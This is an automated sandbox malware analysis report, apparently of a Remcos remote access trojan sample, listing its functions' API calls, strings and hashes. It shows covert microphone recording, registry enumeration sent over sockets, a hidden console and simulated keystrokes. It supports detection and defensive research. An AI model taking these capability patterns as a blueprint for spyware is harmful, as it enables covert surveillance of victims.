                                  • Part of subcall function 00401A6D: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401AD9
                                • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000,?), ref: 00401E02
                                • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401E40
                                • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401E4F
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                • String ID: %Y-%m-%d %H.%M$.wav$dMG$|MG
                                • API String ID: 3809562944-243156785
                                • Opcode ID: ea46db1a35f2c9a2b045b3db18ee993060b77fd334bfa98162aa65f0038d2e9b
                                • Instruction ID: 027c37fd5a1300b84eaed5fd93cda356eabc1c7fedb6cd9f381e221a57c36ff8
                                • Opcode Fuzzy Hash: ea46db1a35f2c9a2b045b3db18ee993060b77fd334bfa98162aa65f0038d2e9b
                                • Instruction Fuzzy Hash: 383181315043019FC324EB21DD46A9A77A8EB84314F40443EF18DA21F2EFB89A49CB5E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00401BE9 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 71COMMON
                                Download Yara Rule
                                APIs
                                • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401BF9
                                • waveInOpen.WINMM(00472AC0,000000FF,00472AA8,Function_00001D0B,00000000,00000000,00000024), ref: 00401C8F
                                • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CE3
                                • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CF2
                                • waveInStart.WINMM ref: 00401CFE
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: wave$BufferCreateDirectoryHeaderOpenPrepareStart
                                • String ID: dMG$|MG$PG
                                • API String ID: 1356121797-532278878
                                • Opcode ID: 4847331a3159101abd2f471b23cb9d67ee169c85da226fed21ec568aa636ce6b
                                • Instruction ID: ba088f7df0b955e0db37e5e5e2d8d6799d5f59e9c832501e8260ac80857d70f0
                                • Opcode Fuzzy Hash: 4847331a3159101abd2f471b23cb9d67ee169c85da226fed21ec568aa636ce6b
                                • Instruction Fuzzy Hash: 53212A71604201AFC739DF6AEE15A6A7BB6FB94715B00803FA10DD76B1DBB84881CB5C
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041D45D Relevance: 14.0, APIs: 7, Strings: 1, Instructions: 48windowstringCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D476
                                  • Part of subcall function 0041D50F: RegisterClassExA.USER32(00000030), ref: 0041D55B
                                  • Part of subcall function 0041D50F: CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D576
                                  • Part of subcall function 0041D50F: GetLastError.KERNEL32 ref: 0041D580
                                • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D4AD
                                • lstrcpynA.KERNEL32(00474B60,Remcos,00000080), ref: 0041D4C7
                                • Shell_NotifyIconA.SHELL32(00000000,00474B48), ref: 0041D4DD
                                • TranslateMessage.USER32(?), ref: 0041D4E9
                                • DispatchMessageA.USER32(?), ref: 0041D4F3
                                • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0041D500
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                • String ID: Remcos
                                • API String ID: 1970332568-165870891
                                • Opcode ID: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                • Instruction ID: 4ccd8a34d55b2cf311069b5b9598b364b65d9d4e2968dcdf9eb94a5ca0393a4d
                                • Opcode Fuzzy Hash: e379e7694b2aceffa08d25cf1e7e1f0c4c43df4e14370d432b5b71655a4afb2b
                                • Instruction Fuzzy Hash: AC015271800245EBD7109FA5EC4CFEABB7CEB85705F004026F515930A1D778E885CB98
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044CD80 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                Download Yara Rule
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 7e166faf4fed60888f6d9a5ae5c37c00b97c36b417cf054fc87f790b28aa2c34
                                • Instruction ID: c2c0890efeac2311cc0422bbb5d66c498191acafde20d8af94b1f6b0c86a236e
                                • Opcode Fuzzy Hash: 7e166faf4fed60888f6d9a5ae5c37c00b97c36b417cf054fc87f790b28aa2c34
                                • Instruction Fuzzy Hash: 5AC1D770D04249AFEF11DFA9C881BAEBBB4EF09314F18415AE914A7392C77C9D41CB69
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00445179 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 266COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                  • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                                  • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                                  • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                                  • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
                                • _memcmp.LIBVCRUNTIME ref: 00445423
                                • _free.LIBCMT ref: 00445494
                                • _free.LIBCMT ref: 004454AD
                                • _free.LIBCMT ref: 004454DF
                                • _free.LIBCMT ref: 004454E8
                                • _free.LIBCMT ref: 004454F4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: _free$ErrorLast$_abort_memcmp
                                • String ID: C
                                • API String ID: 1679612858-1037565863
                                • Opcode ID: 9a230522b66ee103f0b5d02c6619ea6d7647dc78be8ff38f2db07545005a246d
                                • Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
                                • Opcode Fuzzy Hash: 9a230522b66ee103f0b5d02c6619ea6d7647dc78be8ff38f2db07545005a246d
                                • Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041490A Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 225COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: tcp$udp
                                • API String ID: 0-3725065008
                                • Opcode ID: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                • Instruction ID: c6aeaafd44a905d145cb4251883953767b251f71b123717361be5a5837da4da2
                                • Opcode Fuzzy Hash: 856ac91ac91911106c473792f8c7d8f31027b78cae10ba96d9f0cbb069fdbf0d
                                • Instruction Fuzzy Hash: 637177B06083028FDB24CF65C480BABB7E4AFD4395F15442FF88986351E778DD858B9A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0040186A Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 142threadCOMMON
                                Download Yara Rule
                                APIs
                                • __Init_thread_footer.LIBCMT ref: 004018BE
                                • ExitThread.KERNEL32 ref: 004018F6
                                • waveInUnprepareHeader.WINMM(?,00000020,00000000,?,00000020,00474EE0,00000000), ref: 00401A04
                                  • Part of subcall function 00434770: __onexit.LIBCMT ref: 00434776
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ExitHeaderInit_thread_footerThreadUnprepare__onexitwave
                                • String ID: PkG$XMG$NG$NG
                                • API String ID: 1649129571-3151166067
                                • Opcode ID: 9c2ec7c6c1b83300b5a1babe596ab5da8c82b5281600b6710d8cb2eac7fb3d8e
                                • Instruction ID: 5b8630810f78da979eb204bf693be1d55f2004797ab3201abec5cd50ea38d472
                                • Opcode Fuzzy Hash: 9c2ec7c6c1b83300b5a1babe596ab5da8c82b5281600b6710d8cb2eac7fb3d8e
                                • Instruction Fuzzy Hash: BF41B4312042109BC324FB26DD96ABE73A6AB85314F00453FF54AA61F2DF386D49C75E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00413D0D Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 135registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegOpenKeyExW.ADVAPI32(00000000,00000000,00000000,00020019,?), ref: 00413D46
                                  • Part of subcall function 00413A55: RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                  • Part of subcall function 00413A55: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                • RegCloseKey.ADVAPI32(00000000,004660A4,004660A4,00466468,00466468,00000071), ref: 00413EB4
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: CloseEnumInfoOpenQuerysend
                                • String ID: hdF$xUG$NG$NG$TG
                                • API String ID: 3114080316-2774981958
                                • Opcode ID: 35714dc05fda5d1296540c86bd6bb2644e4a9f23417242c8ef15295d75bc172c
                                • Instruction ID: 865164b8d80166fcad8b4517e5ed4c9fbafb7c73de3830c3e78154838722fbed
                                • Opcode Fuzzy Hash: 35714dc05fda5d1296540c86bd6bb2644e4a9f23417242c8ef15295d75bc172c
                                • Instruction Fuzzy Hash: 0B419E316082405BC324F726DC56AEF72959FD1348F40883FF54A671D2EF7C5949866E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00407963 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 102fileCOMMON
                                Download Yara Rule
                                APIs
                                • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000,00000000,00474EE0,00465FA4,?,00000000,00407FFC,00000000), ref: 004079C5
                                • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000,?,000186A0,?,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A0D
                                  • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                • CloseHandle.KERNEL32(00000000,?,00000000,00407FFC,00000000,?,?,0000000A,00000000), ref: 00407A4D
                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00407A6A
                                • CloseHandle.KERNEL32(00000000,00000057,?,00000008,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407A95
                                • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AA5
                                  • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474EF8,00404C49,00000000,00000000,00000000,?,00474EF8,?), ref: 00404BA5
                                  • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                • String ID: .part
                                • API String ID: 1303771098-3499674018
                                • Opcode ID: 975fc53f1639f69eb3a9726ed75faab28c63d052f2da129a73f847dad2aea02b
                                • Instruction ID: 3872d967715c28256f57216ae0d43a20e9ded80e7ed52efebe816600842ab993
                                • Opcode Fuzzy Hash: 975fc53f1639f69eb3a9726ed75faab28c63d052f2da129a73f847dad2aea02b
                                • Instruction Fuzzy Hash: 7F318371508341AFC210EB21DC4599FB7A8FF94359F00493EB545A2192EB78EE48CB9A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0041CD9B Relevance: 12.3, APIs: 4, Strings: 3, Instructions: 48memoryCOMMON
                                Download Yara Rule
                                APIs
                                • AllocConsole.KERNEL32(00475338), ref: 0041CDA4
                                • GetConsoleWindow.KERNEL32 ref: 0041CDAA
                                • ShowWindow.USER32(00000000,00000000), ref: 0041CDBD
                                • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CDE2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: Console$Window$AllocOutputShow
                                • String ID: Remcos v$4.9.3 Pro$CONOUT$
                                • API String ID: 4067487056-3419043855
                                • Opcode ID: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                • Instruction ID: 3d4e39fb732e2b6cb40f789e287104da8d9afdf675614735db993d10cd8ea689
                                • Opcode Fuzzy Hash: 7204a5bae693ec2f4884850c6238c56aa94b879f8555490226ef59d43c8bca4e
                                • Instruction Fuzzy Hash: CD0188719803087AD610F7F1DC8BF9D776C5B14705F6004277604A70D3E7BD9954466E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00407260 Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 40COMMON
                                Download Yara Rule
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID:
                                • String ID: C:\Users\user\Desktop\xi0TpAxHGMsm.exe$Pj$Rmc-4QQORA$hdF
                                • API String ID: 0-4010350062
                                • Opcode ID: a134d68e00a23aec850ce34bab2ba566fca7fbefa287618f70ce8b1be92ee060
                                • Instruction ID: 1b954d03a55cc3c1a25a26db856d3c6076ddce7f3b9fad0ad77fefb3a3407f05
                                • Opcode Fuzzy Hash: a134d68e00a23aec850ce34bab2ba566fca7fbefa287618f70ce8b1be92ee060
                                • Instruction Fuzzy Hash: 2CF046B0F14A00EBCB0467655D186693A05A740356F404C77F907EA2F2EBBD5C41C61E
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 0044AC49 Relevance: 12.2, APIs: 8, Instructions: 216COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044ACA3
                                • __alloca_probe_16.LIBCMT ref: 0044ACDB
                                • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044AD29
                                • __alloca_probe_16.LIBCMT ref: 0044ADC0
                                • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
                                • __freea.LIBCMT ref: 0044AE30
                                  • Part of subcall function 00446137: RtlAllocateHeap.NTDLL(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
                                • __freea.LIBCMT ref: 0044AE39
                                • __freea.LIBCMT ref: 0044AE5E
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocateHeap
                                • String ID:
                                • API String ID: 3864826663-0
                                • Opcode ID: 12305b3b87d107202002273903900b71ffd2ccf102546581680d8e37d1659883
                                • Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
                                • Opcode Fuzzy Hash: 12305b3b87d107202002273903900b71ffd2ccf102546581680d8e37d1659883
                                • Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00419993 Relevance: 12.1, APIs: 8, Instructions: 102keyboardCOMMON
                                Download Yara Rule
                                APIs
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 004199CC
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 004199ED
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A0D
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A21
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000,00000000), ref: 00419A37
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A54
                                • SendInput.USER32(00000001,?,0000001C,?,?,00000000), ref: 00419A6F
                                • SendInput.USER32(00000001,?,0000001C,?,00000000), ref: 00419A8B
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: InputSend
                                • String ID:
                                • API String ID: 3431551938-0
                                • Opcode ID: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                • Instruction ID: babcb3f23bbfeda7ed9031f98f3524dfd9ae94bb4b0c65128b251ed995bccade
                                • Opcode Fuzzy Hash: f95364bfe09dcd8f200507449a759ee15de787b6f4e4bd27b79311205e9f388b
                                • Instruction Fuzzy Hash: CE31B471558349AEE310CF51DC41BEBBBDCEF98B54F00080FF6808A181D2A6A9C88B97
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00447571 Relevance: 10.9, APIs: 3, Strings: 3, Instructions: 389COMMONLIBRARYCODE
                                Download Yara Rule
                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353282963.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_xi0TpAxHGMsm.jbxd
                                Yara matches
                                Similarity
                                • API ID: __freea$__alloca_probe_16_free
                                • String ID: a/p$am/pm$zD
                                • API String ID: 2936374016-2723203690
                                • Opcode ID: f0859f4b60942e64c2417795a0aa154076776a6c217ac3e68ed0847ac231e996
                                • Instruction ID: 9fbfa546a4d6e8c17a1525f8bb1fcc11d6b56032d3bbc67104e2604220ae0e85
                                • Opcode Fuzzy Hash: f0859f4b60942e64c2417795a0aa154076776a6c217ac3e68ed0847ac231e996
                                • Instruction Fuzzy Hash: 6AD1D1B1918206CAFB249F68C845ABBB7B1FF05310F28415BE545AB351D33D9D43CBA9
                                Uniqueness

                                Uniqueness Score: -1.00%

                                Function 00413A55 Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 179registryCOMMON
                                Download Yara Rule
                                APIs
                                • RegQueryInfoKeyW.ADVAPI32(?,?,00000104,00000000,?,?,?,?,?,?,?,?), ref: 00413ABC
                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?,00000104,00000000,?,?,?,?), ref: 00413AEB
                                • RegEnumValueW.ADVAPI32(?,00000000,?,00003FFF,00000000,?,?,00002710,?,?,?,?,?,?,?,?), ref: 00413B8B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1353125627.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1353102419.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353204570.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1353232523.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
